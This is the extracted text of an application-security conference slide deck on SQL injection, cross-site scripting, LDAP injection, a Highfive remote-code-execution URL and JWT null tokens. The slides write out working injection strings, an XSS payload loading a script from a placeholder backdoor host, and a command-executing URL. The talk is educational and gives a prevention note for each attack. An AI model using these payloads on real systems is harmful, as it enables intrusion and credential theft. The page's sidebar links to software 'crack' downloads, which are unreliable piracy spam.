SlideShare a Scribd company logo
Application Security
AOE Conf 2017
What is

Application Security?
Application Security
• Security in software

• Not management security, perimeter security, etc

• Possible Attack vectors

• How to prevent issues
Attack vectors
Code Execution
Make a system execute arbitrary code
Buffer Overflows
• Assembler code injected into memory

• 1996, Aleph One, "Smashing the stack for fun and profit"

• Possible by overflowing a programs memory with
controlled data
SQL Injection
• Execute arbitrary SQL code

• Possible by interpolating user-submitted data without
proper escaping

• Can be used to read/write files on DB server
Cross Site Scripting
• Execute arbitrary JavaScript in a privileged context

• Executed on a client's machine

• Privileged context: Browser (domain/cookies)

• Steal/Modify cookies

• AJAX Requests to privileged areas
Cryptography
Attack cryptographic measures for confidentiality and
integrity
Signatures
• Fake signatures/tokens for unauthorised access
Encryption
• Break encryption

• Missing encryption

• Broken Encryption:

• Example: Bleichenbacher RSA
Business Logic
Make legit code behave in an unintended way
Race Conditions
• Re-order execution flows to change an operations result
Exploit basics
SQL Injection
• Query: SELECT * FROM users WHERE 

username="${USERNAME}" AND 

password="${PASSWORD}";

• Username: Bastian

• Passwort: Sesame098

• Query: SELECT * FROM users WHERE 

username="Bastian" AND 

password="Sesame098";
SQL Injection
• Query: SELECT * FROM users WHERE 

username="${USERNAME}" AND 

password="${PASSWORD}";

• Username: Bastian

• Passwort: " OR 1=1 -- x

• Query: SELECT * FROM users WHERE 

username="Bastian" AND 

password="" OR 1=1 -- x";
SQL Injection
• Query: SELECT * FROM logs WHERE 

token="${TOKEN}";

• Token: a" AND IF(SUBSTRING(

(SELECT password FROM users WHERE
name="admin" LIMIT 1)

,0,1) = 'a', SLEEP(5), 0) -- x

• Query: SELECT * FROM logs WHERE

token="a" AND IF(SUBSTRING(

(SELECT password FROM users WHERE
name="admin" LIMIT 1)

,0,1) = 'a', SLEEP(5), 0) -- x";
Cross-Site Scripting
• Template: <a href="${page}">You are here</a>

• URL: http://example.com/page=hello

• Template: <a href="hello">You are here</a>
Cross-Site Scripting
• Template: <a href="${page}">You are here</a>

• URL: http://example.com/page="><script
src="http://backdoor.com/x.js"></script>

• Template: <a href=""><script src="http://
backdoor.com/x.js"></script>">You are
here</a>
Cross-Site Scripting
• Code runs in Browser of the one opening the link

• Access to Cookies+LocalStorage

• Can send requests and read their result (emulate
administrator behaviour)

• Change page look/behaviour (steal passwords, etc)
Exploits samples
Mattermost LDAP Injection
• https://mattermost/api/v3/users/login

• login_id: username)(givenName=test*

• password: ""

• Response:

• 401: OK, query successful

• 50x: Error, query failed
Mattermost LDAP Injection
Mattermost LDAP Injection
Mattermost LDAP Injection
Mattermost LDAP Injection
• Prevention: properly escape characters which might be
interpreted by LDAP
Highfive RCE
• Target: URL-Handler highfive://

• Possible arguments: ?domain=, ?protocol=
Highfive RCE
Privileged
Non-Privileged Display Web-pages
Execute processes etc
Highfive Sandbox (NW.js)
Whitelist:
https://highfive.com
https://dev.highfive.com
Highfive RCE
• highfive://test.com.a/?
domain=alert(require('child_process').execSyn
c('hostname;echo;id').toString())//
&protocol=javascript
• Starts Highfive on a privileged initial domain

• Redirects to: protocol + '://' + domain + path

• Becomes: 

javascript://
alert(require('child_process').execSync('host
name;echo;id').toString())//something
Highfive RCE
• Redirect to javascript:// does not change the
sandbox

• Works on any operating system

• Thank you JavaScript 😙
Highfive RCE
• Prevention: whitelist redirect targets
JWT Null Tokens
JWT Null Tokens
JWT Null Tokens
JWT Null Tokens
JWT Null Tokens
• Prevention: Do not allow null signature algorithms
Preventive actions
Finding Security issues
• Code Reviews

• Curiosity

• (sometimes: automated scanners)
Stay up to date
React fast
React fast
• Escalation plan for security incidents

• Fast deployment strategies

• Firewall setup to cut off possible infected systems

• Snapshot infrastructure for later analysis
Thank you :)
Questions?

More Related Content

PPTX
Browser Security 101
PDF
AtlasCamp 2014: Writing Connect Add-ons for Confluence
PPTX
Using Controls, calling Launchers. IsolatedStorages and Local DataBase samples
PDF
AtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
PDF
AtlasCamp 2014: Connect Security
PDF
Securing Web Applications with Token Authentication
PPTX
«How to start in web application penetration testing» by Maxim Dzhalamaga
PPTX
An approach to app security - For beginners
Browser Security 101
AtlasCamp 2014: Writing Connect Add-ons for Confluence
Using Controls, calling Launchers. IsolatedStorages and Local DataBase samples
AtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
AtlasCamp 2014: Connect Security
Securing Web Applications with Token Authentication
«How to start in web application penetration testing» by Maxim Dzhalamaga
An approach to app security - For beginners

What's hot (19)

PPTX
Build A Killer Client For Your REST+JSON API
PPTX
Introdcution to Adobe CQ
PPTX
Web Hacking series part 2
PPT
Digər proqramlaşdırma dillərində Android platforması üçün proqramlaşdırma
PDF
Securty Testing For RESTful Applications
PPTX
ASP.NET - Ivan Marković
KEY
Using an in-house WordPress framework
PDF
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
PPTX
Secure Your REST API (The Right Way)
PDF
Authentication: Cookies vs JWTs and why you’re doing it wrong
PDF
How to Harden the Security of Your .NET Website
 
PPTX
Adobe CQ5 for Developers - Introduction
PPT
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
PPTX
Learn css step by step online course
PPTX
Exploiting a vulnerability to gain a shell
PDF
CNIT 129S: Ch 5: Bypassing Client-Side Controls
PDF
All ivanti is a secure workspace - Bsides Delft 2018
PDF
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
PDF
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
Build A Killer Client For Your REST+JSON API
Introdcution to Adobe CQ
Web Hacking series part 2
Digər proqramlaşdırma dillərində Android platforması üçün proqramlaşdırma
Securty Testing For RESTful Applications
ASP.NET - Ivan Marković
Using an in-house WordPress framework
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
Secure Your REST API (The Right Way)
Authentication: Cookies vs JWTs and why you’re doing it wrong
How to Harden the Security of Your .NET Website
 
Adobe CQ5 for Developers - Introduction
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
Learn css step by step online course
Exploiting a vulnerability to gain a shell
CNIT 129S: Ch 5: Bypassing Client-Side Controls
All ivanti is a secure workspace - Bsides Delft 2018
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
Ad

Similar to AOEconf17: Application Security (20)

PPTX
Case Study of Django: Web Frameworks that are Secure by Default
PPTX
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
PDF
Become a Security Ninja
PDF
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
PDF
Do you lose sleep at night?
PDF
2013 OWASP Top 10
PPTX
The OWASP Zed Attack Proxy
PDF
Web Security
PDF
Making Web Development "Secure By Default"
PPT
Django (Web Applications that are Secure by Default)
PDF
Devbeat Conference - Developer First Security
PPT
Top Ten Proactive Web Security Controls v5
PDF
Building Client-Side Attacks with HTML5 Features
PPTX
Spa Secure Coding Guide
PPTX
OWASP top 10-2013
PDF
Hacking sites for fun and profit
PPTX
Web development tips and tricks
PDF
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
PDF
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
PPTX
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Case Study of Django: Web Frameworks that are Secure by Default
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Become a Security Ninja
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Do you lose sleep at night?
2013 OWASP Top 10
The OWASP Zed Attack Proxy
Web Security
Making Web Development "Secure By Default"
Django (Web Applications that are Secure by Default)
Devbeat Conference - Developer First Security
Top Ten Proactive Web Security Controls v5
Building Client-Side Attacks with HTML5 Features
Spa Secure Coding Guide
OWASP top 10-2013
Hacking sites for fun and profit
Web development tips and tricks
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ad

More from AOE (20)

PDF
Re-inventing airport non-aeronautical revenue generation post COVID-19
PDF
Flamingo - Inspiring Commerce Frontend made in Go - Meet Magento 2019
PPTX
Flamingo presentation at code.talks commerce by Daniel Pötzinger
PDF
A bag full of trust - Christof Braun at AOE Conference 2018
PDF
Digitalizing the Global Travel Retail World - Kian Gould at Global Retailing ...
PDF
Frankfurt Airport Digitalization Case Study
PDF
This is what has to change for Travel Retail to survive - Manuel Heidler, AOE
PPTX
AOEconf17: AOE Tech Radar Insights
PDF
AOEconf17: A flight through our OM³ Systems
PDF
AOEconf17: AOE Tech Radar Insights
PDF
AOEconf17: Pets vs. Cattle - modern Application Infrastructure - by Fabrizio ...
PPTX
AOEconf17: Agile scaling concepts
PDF
AOEcon17: Searchperience - The journey from PHP and Solr to Scala and Elastic...
PDF
AOEconf17: UI challenges in a microservice world
PDF
AOEconf17: Application Security - Bastian Ike
PPTX
AOEconf17: Management 3.0 - the secret to happy, performing and motivated sel...
PDF
AOEconf17: How to eat an elePHPant, congstar style - Timo Fuchs & Stefan Rotsch
PDF
Joern Bock: The basic concept of an agile organisation
PPTX
Magento 2 Best Practice Workfow // David Lambauer // Meet Magento 2017 // Lei...
PDF
SUPER-scaling E-Commerce with Magento
Re-inventing airport non-aeronautical revenue generation post COVID-19
Flamingo - Inspiring Commerce Frontend made in Go - Meet Magento 2019
Flamingo presentation at code.talks commerce by Daniel Pötzinger
A bag full of trust - Christof Braun at AOE Conference 2018
Digitalizing the Global Travel Retail World - Kian Gould at Global Retailing ...
Frankfurt Airport Digitalization Case Study
This is what has to change for Travel Retail to survive - Manuel Heidler, AOE
AOEconf17: AOE Tech Radar Insights
AOEconf17: A flight through our OM³ Systems
AOEconf17: AOE Tech Radar Insights
AOEconf17: Pets vs. Cattle - modern Application Infrastructure - by Fabrizio ...
AOEconf17: Agile scaling concepts
AOEcon17: Searchperience - The journey from PHP and Solr to Scala and Elastic...
AOEconf17: UI challenges in a microservice world
AOEconf17: Application Security - Bastian Ike
AOEconf17: Management 3.0 - the secret to happy, performing and motivated sel...
AOEconf17: How to eat an elePHPant, congstar style - Timo Fuchs & Stefan Rotsch
Joern Bock: The basic concept of an agile organisation
Magento 2 Best Practice Workfow // David Lambauer // Meet Magento 2017 // Lei...
SUPER-scaling E-Commerce with Magento

Recently uploaded (20)

PDF
SAP S4 Hana Brochure 3 (PTS SYSTEMS AND SOLUTIONS)
PDF
2025 Textile ERP Trends: SAP, Odoo & Oracle
PDF
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
PPTX
Agentic AI : A Practical Guide. Undersating, Implementing and Scaling Autono...
PPTX
CHAPTER 2 - PM Management and IT Context
PDF
Digital Strategies for Manufacturing Companies
PDF
Understanding Forklifts - TECH EHS Solution
PDF
Softaken Excel to vCard Converter Software.pdf
PDF
Wondershare Filmora 15 Crack With Activation Key [2025
PPTX
L1 - Introduction to python Backend.pptx
PDF
How to Choose the Right IT Partner for Your Business in Malaysia
PDF
Adobe Illustrator 28.6 Crack My Vision of Vector Design
PDF
Adobe Premiere Pro 2025 (v24.5.0.057) Crack free
PDF
Flood Susceptibility Mapping Using Image-Based 2D-CNN Deep Learnin. Overview ...
PPTX
Reimagine Home Health with the Power of Agentic AI​
PDF
top salesforce developer skills in 2025.pdf
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 41
PPTX
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
PDF
Design an Analysis of Algorithms II-SECS-1021-03
PDF
Odoo Companies in India – Driving Business Transformation.pdf
SAP S4 Hana Brochure 3 (PTS SYSTEMS AND SOLUTIONS)
2025 Textile ERP Trends: SAP, Odoo & Oracle
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
Agentic AI : A Practical Guide. Undersating, Implementing and Scaling Autono...
CHAPTER 2 - PM Management and IT Context
Digital Strategies for Manufacturing Companies
Understanding Forklifts - TECH EHS Solution
Softaken Excel to vCard Converter Software.pdf
Wondershare Filmora 15 Crack With Activation Key [2025
L1 - Introduction to python Backend.pptx
How to Choose the Right IT Partner for Your Business in Malaysia
Adobe Illustrator 28.6 Crack My Vision of Vector Design
Adobe Premiere Pro 2025 (v24.5.0.057) Crack free
Flood Susceptibility Mapping Using Image-Based 2D-CNN Deep Learnin. Overview ...
Reimagine Home Health with the Power of Agentic AI​
top salesforce developer skills in 2025.pdf
Internet Downloader Manager (IDM) Crack 6.42 Build 41
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
Design an Analysis of Algorithms II-SECS-1021-03
Odoo Companies in India – Driving Business Transformation.pdf

AOEconf17: Application Security